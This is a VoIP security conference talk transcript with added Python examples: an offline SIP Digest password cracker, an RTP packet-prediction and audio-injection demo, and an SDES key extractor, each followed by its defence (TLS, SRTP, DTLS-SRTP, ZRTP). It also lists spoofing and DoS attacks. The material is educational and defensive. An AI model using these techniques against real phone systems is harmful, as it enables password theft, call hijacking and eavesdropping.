Securing Voice Communication
Description: A presentation given at AdhearsionConf 2013 about possible attacks against SIP and RTP and the corresponding countermeasures.
Transcript
SECURING VOICE COMMUNICATION
(The NSA does not need to hear about this.)
by Luca Pradovera
Securing telephony - AdhearsionConf 2013 - December 4 and 5, Atlanta, GA
About me: Luca Pradovera, Voice Application Developer, Mojo Lingo LLC, Atlanta, GA
CAN WE TRUST VOIP? NO.
Alice, Bob and Bubba
All cleartext! By default both the signaling and the media can be read by anyone on the path.
Signaling: SIP (Session Initiation Protocol)
SIP is similar to HTTP
Request methods: INVITE, ACK, BYE
Headers: To, From
INVITE sip:[email protected] SIP/2.0
Via: SIP/2.0/UDP 10.203.175.1:63851;rport;branch=z9hG4bKPjOZmllyLuQ52Gda.vzcmWrVVtmFKSyRuz
Max-Forwards: 70
From: "Luca Pradovera" <sip:[email protected]>;tag=DRTwWU5q2EfrbebG7IMvd3RdDbsKFPOX
To: <sip:[email protected]>
Contact: <sip:[email protected]:63851>
Call-ID: PvpN2LErALSXW16MbkJPBcZNf7fzeSc4
CSeq: 15461 INVITE
Allow: SUBSCRIBE, NOTIFY, PRACK, INVITE, ACK, BYE, CANCEL, UPDATE, MESSAGE, REFER
Supported: 100rel, replaces, norefersub, gruu
User-Agent: Blink Pro 3.4.0 (MacOSX)
Authorization: Digest username="usera", realm="asterisk", nonce="080a602e", uri="sip:[email protected]", response="40732f23b39bc681484874c89c424bf4", algorithm=MD5
SIP Headers
Content-Type: application/sdp
Content-Length: 396
v=0
o=- 3595073567 3595073567 IN IP4 10.203.175.1
s=Blink Pro 3.4.0 (MacOSX)
c=IN IP4 10.203.175.1
t=0 0
m=audio 50000 RTP/AVP 108 99 98 9 0 8 96
a=rtcp:50001
a=rtpmap:108 opus/48000
a=fmtp:108 useinbandfec=1
a=rtpmap:9 G722/8000
a=rtpmap:0 PCMU/8000
a=rtpmap:8 PCMA/8000
a=rtpmap:96 telephone-event/8000
a=fmtp:96 0-15
a=sendrecv
SDP Payload
Attacking SIP (TRY THIS AT SOMEONE ELSE'S HOME.)
SIP digest auth is weak.
MD5-1 = MD5(Username:Realm:Password)
MD5-2 = MD5(Method:URI)
Response = MD5(MD5-1:Nonce:MD5-2)
Username, realm, nonce, method, URI and the response itself all travel in the cleartext request; the only unknown term is the password.
An offline attack is possible: capture one authenticated request and guess passwords at MD5 speed, without ever talking to the PBX.
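The offline attack on the slide, as an added example (not code from the talk): it parses an Authorization header, recomputes the response for each candidate password exactly as the client did, and stops when the hashes match. The captured header is constructed inside the script from the username and realm shown in the INVITE above, a hypothetical URI `sip:userb@pbx.example.com`, and a throw-away password; the tiny wordlist is constructed too. The slide gives the RFC 2069 form of the computation; when the challenge carries `qop=auth` the client also mixes in nc and cnonce, but those are visible in the same header, so the attack is unchanged and the code handles both.

```python
"""Offline dictionary attack on SIP Digest authentication (added example)."""
import hashlib
import re


def md5hex(s):
    return hashlib.md5(s.encode()).hexdigest()


def parse_digest(header):
    """Split 'Digest k="v", k2=v2, ...' (RFC 2617 syntax) into a dict."""
    _, _, params = header.partition(" ")
    return {k: v.strip('"')
            for k, v in re.findall(r'(\w+)=("[^"]*"|[^,\s]+)', params)}


def digest_response(method, password, p):
    """Recompute the response the way the client did (RFC 2617 section 3.2.2)."""
    ha1 = md5hex(f"{p['username']}:{p['realm']}:{password}")
    ha2 = md5hex(f"{method}:{p['uri']}")
    if p.get("qop") == "auth":              # nc/cnonce are in the header too
        return md5hex(f"{ha1}:{p['nonce']}:{p['nc']}:{p['cnonce']}:auth:{ha2}")
    return md5hex(f"{ha1}:{p['nonce']}:{ha2}")   # the RFC 2069 form on the slide


def crack(method, header, wordlist):
    """One MD5 triple per candidate; no traffic to the PBX, no lockout."""
    p = parse_digest(header)
    for cand in wordlist:
        if digest_response(method, cand, p) == p["response"]:
            return cand
    return None


def build_header(method, username, realm, nonce, uri, password,
                 qop=None, nc=None, cnonce=None):
    """What a client sends after a 401/407 challenge; used to fabricate a capture."""
    p = {"username": username, "realm": realm, "nonce": nonce, "uri": uri}
    if qop:
        p.update(qop=qop, nc=nc, cnonce=cnonce)
    resp = digest_response(method, password, p)
    fields = [f'username="{username}"', f'realm="{realm}"',
              f'nonce="{nonce}"', f'uri="{uri}"']
    if qop:
        fields += [f"qop={qop}", f"nc={nc}", f'cnonce="{cnonce}"']
    fields += [f'response="{resp}"', "algorithm=MD5"]
    return "Digest " + ", ".join(fields)


# Constructed capture: realm and username as on the slide, hypothetical URI,
# and "letmein1" as a throw-away test password (not a real credential).
CAPTURED = build_header("INVITE", "usera", "asterisk", "080a602e",
                        "sip:userb@pbx.example.com", "letmein1")
WORDLIST = ["password", "1234", "letmein1", "asterisk"]   # constructed, tiny

if __name__ == "__main__":
    print(CAPTURED)
    print("recovered password:", crack("INVITE", CAPTURED, WORDLIST))
```

The defence is not a stronger hash but keeping the header away from the attacker: carry SIP over TLS (next slides), use long random passwords per device, and rate-limit or alert on repeated 401/407 exchanges from one source.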
SIP is vulnerable
• Forging Contact: to hijack a session (registration hijacking: calls for the victim are routed to the attacker)
• Denial of service via BYE (tearing down someone else's call with a forged request)
• Easy man-in-the-middle attacks
• Denial of service via REGISTER
• Identity theft (a spoofed From: header is all it takes to fake the caller)
• DoS via Expires: 0 (a forged REGISTER that removes the victim's bindings)
How do we solve this? SIPS (SIP Secure): SIP over TLS, normally on TCP port 5061.
Very similar to HTTPS. Requires client support, and the protection is hop by hop: each proxy terminates TLS and sees the signaling in the clear.
Software support
• Asterisk: https://wiki.asterisk.org/wiki/display/AST/Secure+Calling+Tutorial
• FreeSWITCH: http://wiki.freeswitch.org/wiki/SIP_TLS
• Many softphones and hardware phones
Media: RTP (Real-time Transport Protocol)
RTP Basics
• Runs over UDP
• Dynamic ports above 1024 (up to 65535); the port for each stream is advertised in the SDP m= line, with RTCP on the next port (50000/50001 in the SDP above)
Let me hear you say…
• Packet sniffing enables easy eavesdropping: unencrypted RTP can be reassembled and played back straight from a capture
• A switched network requires an ARP cache poisoning attack, but not much more
CREEPY DEMO TIME!
What if I want to be REALLY bad?
The timestamp usually starts at 0 and increments by the number of samples per packet (e.g. 160 for 20 ms of 8 kHz audio); the sequence number starts at 0 and increments by 1; the SSRC is fixed for the session and in many stacks is derived from the clock. RFC 3550 recommends random initial values, but many implementations do not bother.
= They are PREDICTABLE!
How can we have fun?
Audio injection: by predicting timestamp, sequence number and SSRC, we can inject whatever frame we want into the stream.
"Did you just say something?"
Audio replacement: using higher sequence numbers and timestamps, we make the original audio packets look stale, so the receiver discards them and plays ours instead.
Just replace "buy" with "sell" and watch Bitcoin crash!
What if I am just grumpy?
• DoS via packet flooding (keep repeating a packet)
• DoS via RTCP BYE (session teardown)
By the way, the NSA knows about this.
(AND IN CASE THEY WERE MISSING ANYTHING, IT IS IN MY DROPBOX ANYWAY)
SRTP (Secure RTP, RFC 3711)
• Uses symmetric keys and ciphers that need to be negotiated somehow
• Uses AES in counter mode (AES-CM) with 128-bit keys by default (192- and 256-bit keys were added by RFC 6188)
• Generates a keystream that is XORed in real time with the plaintext media, so the ciphertext is the same length as the plaintext
• The payload is encrypted; header and payload are authenticated with an HMAC-SHA1 tag (80 or 32 bits) that also covers the sequence number, timestamp and SSRC, so the prediction attacks above no longer work
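An added example (not code from the talk) that ties the two halves together: the audio injection and replacement slides above, and the SRTP authentication described here. The first half builds RFC 3550 packets, predicts the next header from one sniffed packet, and shows a receiver that plays the newest sequence number treating Alice's real audio as stale once a forged packet with a higher sequence number arrives. The second half protects the same packets with SRTP's HMAC-SHA1-80 tag (RFC 3711 section 4.2) and shows the forgery failing the check. The SSRC, the session authentication key and the audio bytes are constructed values; the payload is left in the clear (RFC 3711's NULL cipher) because the point is the tag, and this keeps the script to the standard library. The receiver model is deliberately minimal: real jitter buffers are more elaborate, but plain RTP gives them nothing but sequence numbers and timestamps to decide with.

```python
"""RTP header prediction, a 'newest wins' receiver, and SRTP's answer (added example)."""
import hashlib
import hmac
import struct

PT_PCMU = 0
SAMPLES_PER_PACKET = 160      # 20 ms of 8 kHz audio, the usual G.711 framing
AUTH_TAG_LEN = 10             # HMAC-SHA1-80 = 80-bit tag


def build_rtp(seq, ts, ssrc, payload, pt=PT_PCMU, marker=0):
    """12-byte fixed header: V=2,P=0,X=0,CC=0 then M/PT, seq, timestamp, SSRC."""
    return struct.pack("!BBHII", 0x80, (marker << 7) | pt,
                       seq & 0xFFFF, ts & 0xFFFFFFFF, ssrc) + payload


def parse_rtp(pkt):
    first, second, seq, ts, ssrc = struct.unpack("!BBHII", pkt[:12])
    hdr_len = 12 + 4 * (first & 0x0F)          # skip any CSRC entries
    return {"seq": seq, "ts": ts, "ssrc": ssrc,
            "pt": second & 0x7F, "payload": pkt[hdr_len:]}


def seq_newer(cur, new):
    """16-bit wrap-around comparison: is `new` ahead of `cur`?"""
    return 0 < ((new - cur) & 0xFFFF) < 0x8000


def predict(sniffed, ahead=1, step=SAMPLES_PER_PACKET):
    """Everything needed to forge packet N+ahead is in packet N."""
    h = parse_rtp(sniffed)
    return {"seq": (h["seq"] + ahead) & 0xFFFF,
            "ts": (h["ts"] + ahead * step) & 0xFFFFFFFF, "ssrc": h["ssrc"]}


class NaiveReceiver:
    """Plays the newest sequence number seen for its SSRC and drops older ones."""

    def __init__(self, ssrc):
        self.ssrc, self.highest, self.played = ssrc, None, []

    def receive(self, pkt):
        h = parse_rtp(pkt)
        if h["ssrc"] != self.ssrc:
            return False
        if self.highest is not None and not seq_newer(self.highest, h["seq"]):
            return False                        # stale: dropped
        self.highest = h["seq"]
        self.played.append(h["payload"])
        return True


def srtp_tag(auth_key, pkt, roc):
    """RFC 3711 4.2: HMAC-SHA1(k_a, header || payload || ROC), truncated to 80 bits.
    The tag covers seq, timestamp and SSRC, so a predicted header is useless without k_a."""
    mac = hmac.new(auth_key, pkt + struct.pack("!I", roc), hashlib.sha1)
    return mac.digest()[:AUTH_TAG_LEN]


def srtp_protect(auth_key, pkt, roc=0):
    return pkt + srtp_tag(auth_key, pkt, roc)


def srtp_unprotect(auth_key, protected, roc=0):
    """Return the RTP packet, or None if the tag does not verify."""
    pkt, tag = protected[:-AUTH_TAG_LEN], protected[-AUTH_TAG_LEN:]
    return pkt if hmac.compare_digest(tag, srtp_tag(auth_key, pkt, roc)) else None


def run_demo():
    ssrc = 0x1234ABCD                                   # constructed
    alice_frame = bytes([0xFF]) * SAMPLES_PER_PACKET    # PCMU near-silence
    bubba_frame = bytes([0x00]) * SAMPLES_PER_PACKET    # the injected audio
    alice = [build_rtp(s, s * SAMPLES_PER_PACKET, ssrc, alice_frame) for s in range(4)]

    # Bubba sniffs packet 0 and forges a packet 8 frames ahead of it
    g = predict(alice[0], ahead=8)
    forged = build_rtp(g["seq"], g["ts"], g["ssrc"], bubba_frame)

    # Plain RTP: the forgery plays, and Alice's following packets look stale
    plain = NaiveReceiver(ssrc)
    plain.receive(alice[0])
    forged_played = plain.receive(forged)
    legit_dropped = [not plain.receive(p) for p in alice[1:]]

    # SRTP: Bubba has no authentication key, so the tag he appends is a guess
    auth_key = bytes(range(20))                         # constructed 160-bit session auth key
    secure = NaiveReceiver(ssrc)
    legit_ok = [secure.receive(srtp_unprotect(auth_key, srtp_protect(auth_key, p)))
                for p in alice]
    forged_srtp = forged + bytes(AUTH_TAG_LEN)
    return {"forged_played": forged_played,
            "legit_dropped_after_forgery": all(legit_dropped),
            "srtp_forgery_accepted": srtp_unprotect(auth_key, forged_srtp) is not None,
            "srtp_legit_accepted": all(legit_ok)}


if __name__ == "__main__":
    for k, v in run_demo().items():
        print(f"{k}: {v}")
```

Note what the tag buys: the attacker can still drop or flood packets (the DoS cases on the previous slide), but cannot make the receiver accept audio it did not key.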
Still need those keys… (NEGOTIATION)
MIKEY and SDES
SDES (SDP Security Descriptions, RFC 4568):
a=crypto:1 AES_CM_128_HMAC_SHA1_80 inline:d0RmdmcmVCspeEc3QGZiNWpVLFJhQX1cfHAwJSoj|2^20|1:32
The master key travels in the SDP itself, so SDES requires full TLS protection of the signaling and still exposes the keying material to every SIP server on the path.
MIKEY (RFC 3830) never saw wide adoption because it requires additional SIP capabilities.
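To make the SDES exposure concrete, an added example (not code from the talk or from any SDES implementation) that parses the `a=crypto` line quoted above and recovers the SRTP master key and salt from it: anything that can read the SDP, whether a proxy, a B2BUA or a sniffer on an unencrypted hop, can do the same. The key lengths per crypto-suite follow RFC 4568; the slide's line is embedded as the sample input.

```python
"""Parse an SDES a=crypto line (RFC 4568) and extract the SRTP keying material."""
import base64
import re

# RFC 4568 section 6.2: (master key length, master salt length) in bytes
SUITES = {
    "AES_CM_128_HMAC_SHA1_80": (16, 14),
    "AES_CM_128_HMAC_SHA1_32": (16, 14),
    "F8_128_HMAC_SHA1_80": (16, 14),
}

CRYPTO_RE = re.compile(r"a=crypto:(\d+)\s+(\S+)\s+inline:(\S+)(?:\s+(.*))?$")


def parse_crypto(line):
    """a=crypto:<tag> <suite> inline:<b64key>[|<lifetime>][|<mki>:<len>] [session-params]"""
    m = CRYPTO_RE.match(line.strip())
    if not m:
        raise ValueError("not an a=crypto line")
    tag, suite, keyinfo, session_params = m.groups()
    if suite not in SUITES:
        raise ValueError(f"unknown crypto-suite {suite}")
    key_len, salt_len = SUITES[suite]
    parts = keyinfo.split("|")
    raw = base64.b64decode(parts[0])            # key || salt, base64 without padding issues
    if len(raw) != key_len + salt_len:
        raise ValueError(f"expected {key_len + salt_len} key+salt bytes, got {len(raw)}")
    info = {"tag": int(tag), "suite": suite,
            "master_key": raw[:key_len], "master_salt": raw[key_len:],
            "lifetime": None, "mki": None, "mki_length": None,
            "session_params": session_params.split() if session_params else []}
    for extra in parts[1:]:
        if ":" in extra:                        # MKI value and its length in bytes
            mki, mki_len = extra.split(":")
            info["mki"], info["mki_length"] = int(mki), int(mki_len)
        else:                                   # lifetime, written as 2^20 or as an integer
            base, _, exp = extra.partition("^")
            info["lifetime"] = int(base) ** int(exp) if exp else int(base)
    return info


# The line quoted on the slide
SLIDE_LINE = ("a=crypto:1 AES_CM_128_HMAC_SHA1_80 "
              "inline:d0RmdmcmVCspeEc3QGZiNWpVLFJhQX1cfHAwJSoj|2^20|1:32")

if __name__ == "__main__":
    k = parse_crypto(SLIDE_LINE)
    print("suite      :", k["suite"])
    print("master key :", k["master_key"].hex())
    print("master salt:", k["master_salt"].hex())
    print("lifetime   :", k["lifetime"], "packets; MKI", k["mki"], "of", k["mki_length"], "bytes")
```

Everything SRTP needs to derive the session keys is in those 30 decoded bytes; this is why the next two slides move keying out of the signaling and into the media path.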
Keying in the media path: DTLS-SRTP (RFC 5763/5764)
• DTLS handshake over the media port
• The SRTP master keys are derived from the secrets of the DTLS handshake
• Uses certificates, but does not need a PKI: peers normally present self-signed certificates and bind them to the call with an a=fingerprint attribute in the SDP, so detecting a man-in-the-middle relies on the integrity of the signaling path
• Used by WebRTC
ZRTP (Z is cooler than S.)
What it does
1. Discovery phase, to find out if the peers support ZRTP
2. Key agreement phase, to exchange the keying data
3. Secure phase, confirming the cryptographic exchange worked and switching to SRTP
How it works
• The exchange happens in the media path, so it does not depend on SIP or on any server
• Diffie-Hellman key exchange (unauthenticated on its own, which is why the next step exists)
• A SAS (Short Authentication String) is produced so it can be compared by humans
Hellman, the mayonnaise guy?
Why is the SAS important?
• The Short Authentication String is derived from a hash of the shared secret negotiated during the DH exchange
• It is usually four characters (base32) or two words from the PGP word list
• When both parties read it aloud over the call and it matches, there is no man-in-the-middle: an attacker who ran two separate DH exchanges would leave the two ends with two different strings
• The shared secret is cached, so once a call has been verified, subsequent calls between the same peers inherit that trust (key continuity) without comparing the SAS again
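The key agreement and the SAS, as an added example rather than code from the talk or from any ZRTP stack. It runs an unauthenticated Diffie-Hellman exchange in the 2048-bit MODP group ZRTP calls DH2k (RFC 3526 group 14), derives a four-character z-base-32 SAS the way RFC 6189 does at the end of the chain (first 20 bits of a hash), and then puts Mallory between the two ends. The derivation of s0 is simplified and labelled as such: a SHA-256 over the shared secret and both public values stands in for the full ZRTP KDF and total_hash. That is enough to show the property the slide relies on, that two separate DH exchanges leave Alice and Bob with different strings. The private exponents are drawn fresh on each run.

```python
"""ZRTP-style DH key agreement and SAS, honest and with a man in the middle (added example)."""
import hashlib
import secrets

# RFC 3526 group 14: 2048-bit MODP prime with generator 2 (ZRTP "DH2k")
P = int(
    "FFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74"
    "020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F1437"
    "4FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7ED"
    "EE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF05"
    "98DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB"
    "9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3B"
    "E39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF695581718"
    "3995497CEA956AE515D2261898FA051015728E5A8AACAA68FFFFFFFFFFFFFFFF", 16)
G = 2
ZB32 = "ybndrfg8ejkmcpqxot1uwisza345h769"   # RFC 6189 section 5.1.6 alphabet


def dh_keypair():
    x = secrets.randbits(256)               # private exponent
    return x, pow(G, x, P)


def dh_shared(x, peer_pub):
    if not 1 < peer_pub < P - 1:            # reject 0, 1 and p-1 (trivial subgroups)
        raise ValueError("bad DH public value")
    return pow(peer_pub, x, P)


def to_bytes(n):
    return n.to_bytes((n.bit_length() + 7) // 8, "big")


def derive_s0(shared, pub_i, pub_r):
    """Simplified stand-in for RFC 6189 4.4.1.4 (real s0 also hashes Hello/Commit/DHPart)."""
    return hashlib.sha256(b"ZRTP-s0" + to_bytes(shared) + to_bytes(pub_i) + to_bytes(pub_r)).digest()


def sas_b32(s0):
    """RFC 6189 4.5.2 shape: sashash -> first 32 bits -> leftmost 20 bits -> 4 z-base-32 chars.
    The sashash KDF is simplified to a SHA-256 here."""
    sashash = hashlib.sha256(b"SAS" + s0).digest()
    bits = int.from_bytes(sashash[:4], "big") >> 12
    return "".join(ZB32[(bits >> shift) & 31] for shift in (15, 10, 5, 0))


def honest_call():
    """Alice and Bob exchange public values directly: one shared secret, one SAS."""
    a_priv, a_pub = dh_keypair()
    b_priv, b_pub = dh_keypair()
    sas_a = sas_b32(derive_s0(dh_shared(a_priv, b_pub), a_pub, b_pub))
    sas_b = sas_b32(derive_s0(dh_shared(b_priv, a_pub), a_pub, b_pub))
    return sas_a, sas_b


def mitm_call():
    """Mallory runs one DH with Alice and another with Bob: two secrets, two SASes."""
    a_priv, a_pub = dh_keypair()
    b_priv, b_pub = dh_keypair()
    m1_priv, m1_pub = dh_keypair()          # Mallory's key facing Alice
    m2_priv, m2_pub = dh_keypair()          # Mallory's key facing Bob
    sas_a = sas_b32(derive_s0(dh_shared(a_priv, m1_pub), a_pub, m1_pub))
    sas_b = sas_b32(derive_s0(dh_shared(b_priv, m2_pub), m2_pub, b_pub))
    return sas_a, sas_b


if __name__ == "__main__":
    print("honest call, Alice/Bob SAS:", honest_call())
    print("with Mallory, Alice/Bob SAS:", mitm_call())
```

Mallory can decrypt and re-encrypt every packet, so the audio still flows; what Mallory cannot do is make the two strings equal, which is why the comparison has to happen out of band in the voices of the two parties, and why the cached secret makes the check a one-time cost per peer.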
Benefits
• Does not require any signaling security
• It is, in fact, signaling and server agnostic (SIP, H.323, Jingle, WebRTC)
• Protected against man-in-the-middle attacks (once the SAS has been compared)
• Best-effort encryption with feedback (the user agent knows whether the line is secure or not)
• It has a Z in the acronym.
Software support
• FreeSWITCH: https://wiki.freeswitch.org/wiki/ZRTP
• Jitsi: https://jitsi.org/
• Zfone: http://zfoneproject.com/
Final caveats
• You are never truly secure
• Ensure you never drop out of the IP network (a PSTN leg is cleartext again)
• Endpoints are easy targets
Bibliography
• Hacking VoIP: Protocols, Attacks and Countermeasures (http://goo.gl/33EtU7)
• SIP: Understanding the Session Initiation Protocol (http://goo.gl/sFSsSi)
• Applied Cryptography: Protocols, Algorithms, and Source Code in C (http://goo.gl/U4QOJj)
• Countless RFCs and extensions
Thank you!
• http://mojolingo.com
• @lucaprado on Twitter
• polysics on Github and IRC